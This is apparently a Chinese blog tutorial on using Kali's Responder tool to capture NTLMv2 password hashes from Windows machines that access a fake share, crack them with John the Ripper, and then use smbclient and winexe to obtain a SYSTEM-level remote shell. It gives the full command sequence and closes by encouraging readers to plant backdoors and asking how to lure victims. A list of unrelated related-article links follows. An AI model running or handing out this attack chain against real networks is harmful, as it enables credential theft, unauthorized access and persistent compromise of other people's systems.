不利用系统漏洞拿shell,kali强大工具Responder
这是一种不用通过漏洞利用来获取权限的一种方法,使用的是kali的一个工具,叫Responder,主要是通过监听网络,有人如果访问了虚假的共享文件地址,就会获得该系统登录口令的哈希值,然后再通过脚本进行hash爆破就可以获取口令,再通过ipc建立空连接获得系统权限。
我们的第一步当然是获取该工具喽,非常的简单,只要从github上下载即可,
当然首先你先需要安装一下python环境和git工具
# apt-get intall build-essential git python-dev
然后是直接从git上克隆到本地
# git clone https://github.com/lgandx/Responder.git
等他下载完成然后需要进行一下更新(如果存在更新的话)
# cd Respondder/
#git pull
会出现一个
Already up-to-date(以更新到最新)
然后我们就可以使用啦!
ok,那我们开始正文!
那些什么-h啥的就不废话了,不会有人真的不知道吧
首先我们启动一个内网监听(需要先cd到responder文件夹下)
# ./Responder.py -wf -I eth0
-wf 应该是设定web代理 -I 指定网卡,这里我指定的是eth0,我们可以通过ifconfig指令查看自己的ip以及网卡信息,具体怎么添加删除一个网卡这里不再赘述,scdn一搜一大堆
如下图,开始监听了。
然后我们在任何windows系统访问一下虚假的共享文件地址,
<******>\\NOTAREALHOST\NOTARALSHARE\notarealfile.exe
会出现拒绝访问
然后我们的监听端就会出现一些奇妙的信息。
没错,我们抓到了我们的登录口令hash
然后我们q退出,运行
./DumpHash.py
会把我们抓到的hash导出成john可以处理的格式
这里我们抓到了两个hash,一个是我本机的登录口令,一个是我的虚拟机windows server 2012R2的登录口令hash
我们的根目录会生成两个txt文件,分别存储的是两个版本的hash,具体是什么版本在我们上一步导出时已经明确指出,如上图:时NTLMV2版本。
然后我们用我们的john进行指定版本hash爆破,爆破并不是百分百成功的。
john DumpNTLMv2.txt
现在我们能做的只有等。。。
获取到口令之后我们能干的事情就太多了,看22端口开了嘛,开了直接ssh连接,或者还有更强的,验证目标系统上是否存在ipc共享,如下:
smbclient -U [username]%[password] -L [ipaddress]
ok可以清楚的看到它开着,然后我们直接用kali自带工具winexe拿shell
winexe -U [username]%[password] --uninstall \\[ipaddress] cmd.exe
或者直接给他提升系统权限
winexe -U [username]%[password] --uninstall --system \\[ipaddress] cmd.exe
注意一定要带参数–unistall 不然会留下你的大猪蹄子的哦
直接就是系统权限,该留后门留后门,该干嘛干嘛就完事了,一次愉快的旅程,*但是有个问题,怎么诱导它访问共享文件呢?that is a question。 *
不利用系统漏洞拿shell,kali强大工具Responder相关推荐
- 【系统漏洞检测】Windows分析工具
文章目录 一.Sherlock 二.PrivescCheck 三.Windows补丁在线查询 一.Sherlock GitHub:https://github.com/rasta-mouse/Sher ...
- SharpSCCM:一款利用SCCM实现横向渗透的强大工具
关于SharpSCCM SharpSCCM是一款功能强大的横向渗透和凭证收集工具,该工具主要利用了微软终端配置管理器(SCCM)来实现其功能,并能够通过访问SCCM管理终端GUI来实现横向渗透和凭证收 ...
- 常见被病毒利用的漏洞补丁
近期较忙,几乎没时间打理博客.近期遇到了很多利用系统漏洞传播的病毒,而且该漏洞都是以前很久发布的.为了方便自己同时也可以给广大朋友提供参考,将一些常见的系统漏洞信息及补丁收集在一起. MS03-026 ...
- 防范因编写代码产生的系统漏洞
用于互联网服务的系统安全性是至关重要的.在过去的2018年,发生了多起用户信息泄密事件,其中不乏著名的互联网公司,攻击者都是利用系统漏洞获取用户的账号和密码,从而进一步获取用户的信息. 什么是系统漏洞 ...
- 最详细的系统漏洞扫描并对靶机进行利用攻击演练(模拟一次黑客白帽子操作)
万万不可做坏事,仅为学习参考使用. 一.前提准备 1.所需条件: (1)kali2.0 linux 的iso文件(最好是32位,为安装nessus做好装备) 下载网址:https://www.kali ...
- 通过Kali利用serv-u漏洞获取win7系统管理员权限
serv-u5.0.0.0版本下载链接:https://pan.baidu.com/s/1kRyByC1SbipRMrbLdd6f1w 提取码:m4of 环境说明 机器 ip地址 Kali主机 192 ...
- python dos攻击_利用SMB漏洞DoS攻击任何Windows系统
原标题:利用SMB漏洞DoS攻击任何Windows系统 近日微软报出SMB V1存在漏洞,安全研究员并将此漏洞称作 " SMBLoris ",解释其能够发动拒绝服务(Dos)攻击, ...
- 新病毒仿熊猫烧香 利用 Vista系统漏洞疯狂传播
3月31日,瑞星全球反病毒监测网截获一个与"熊猫烧香"非常相似的高危病毒,命名为"ANI蠕虫(Worm.DlOnlineGames.a)".该病毒不光传播和危害 ...
- 安全专家教你如何利用Uber系统漏洞无限制的免费乘坐?
本文讲的是安全专家教你如何利用Uber系统漏洞无限制的免费乘坐?,近日,根据外媒报道,美国一名安全研究人员发现Uber上存在一处安全漏洞,允许发现这一漏洞的任何用户在全球范围内免费享受Uber乘车服务 ...
最新文章
- zedboard:使用ISE和modelsim搭建仿真环境
- oracle杀死进程时权限不足_在oracle中创建函数时权限不足
- C语言中的神兽strdup
- 使用matlab进行简单图像处理
- 批量创建钱包地址并保存私钥
- 抽象工厂模式(Abstract Factory Pattern)
- 分享咖啡基础知识——从咖啡小白到咖啡发烧友需要了解的那些事儿!
- SpringBoot项目,从创建到简单实战
- 北斗导航 | EagleEye2000:国产激光雷达走进测绘世界
- Pend Lists
- Windows下安装Cygwin及包管理器apt-cyg(转)
- MATLAB连接MYSQL搞数据
- C语言——大小写字母转换
- 在阿里云 ACK 上部署 EMQX MQTT 服务器集群
- vb 复制 剪贴板 html,用vb实现将脚本的输出复制到剪贴板
- 北京信息科技大学第十三届程序设计竞赛暨ACM选拔赛(重现赛)题解
- iOS偏好设置的存储注意事项
- sublime 正则跨行匹配
- MySQL参数binlog-do-db对binlogs写入的影响
- SCSI协议及大容量存储命令详解
热门文章
- 【计算机视觉40例】案例19:行人检测
- 进入Design House 揭秘手机设计痛苦过程
- 徕卡或于3月6日发布新款Q2相机
- 【Java面试题】MVC是什么?MVC设计模式的好处有哪些?
- linux的主要内容,linux视频教程主要内容
- FZU-1921 栀子花开(线段树)
- Midjourney免费账号
- JQuery 02 转换图片
- ffly-plus 又又又一个`gin` demo项目,带你快速上手用`gin`进行`web`开发!!!!
- 51单片机使用printf函数输出